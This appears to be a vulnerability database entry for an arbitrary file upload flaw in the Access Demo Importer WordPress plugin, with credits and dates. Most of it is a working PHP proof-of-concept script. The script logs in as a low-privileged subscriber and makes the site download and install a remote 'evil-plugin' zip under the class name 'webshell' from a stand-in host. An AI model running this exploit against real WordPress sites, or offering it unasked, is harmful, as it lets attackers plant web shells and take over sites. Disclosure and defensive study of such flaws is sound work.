Versions up to, and including, 1.0.6, of the Access Demo Importer WordPress plugin are vulnerable to arbitrary file uploads via the plugin_offline_installer AJAX action due to a missing capability check in the plugin_offline_installer_callback functionfound in the ~/inc/demo-functions.php file along with insufficient file validation.
<?php // Settings $wp_url = $argv[1]; $wp_user = $argv[2]; $wp_pass = $argv[3]; // 1) Log in as subscriber $ch = curl_init(); $cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-'); curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php'); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ 'log' => $wp_user, 'pwd' => $wp_pass, 'rememberme' => 'forever', 'wp-submit' => 'Log+In', ]); $output = curl_exec($ch); curl_close($ch); // Update Settings $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php'); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ 'action' => 'plugin_offline_installer', 'file_location' => 'https://example.com/evil-plugin.zip', 'file' => 'evil-plugin.php', 'host_type' => 'remote', 'class_name' => 'webshell', 'slug' => 'evil-plugin' ]); $output = curl_exec($ch); curl_close($ch); print_r($output); ?>
UPLOAD
Chloe Chamberland
Chloe Chamberland
Yes
2021-10-06 (about 1 years ago)
2021-10-06 (about 1 years ago)
2022-04-09 (about 1 years ago)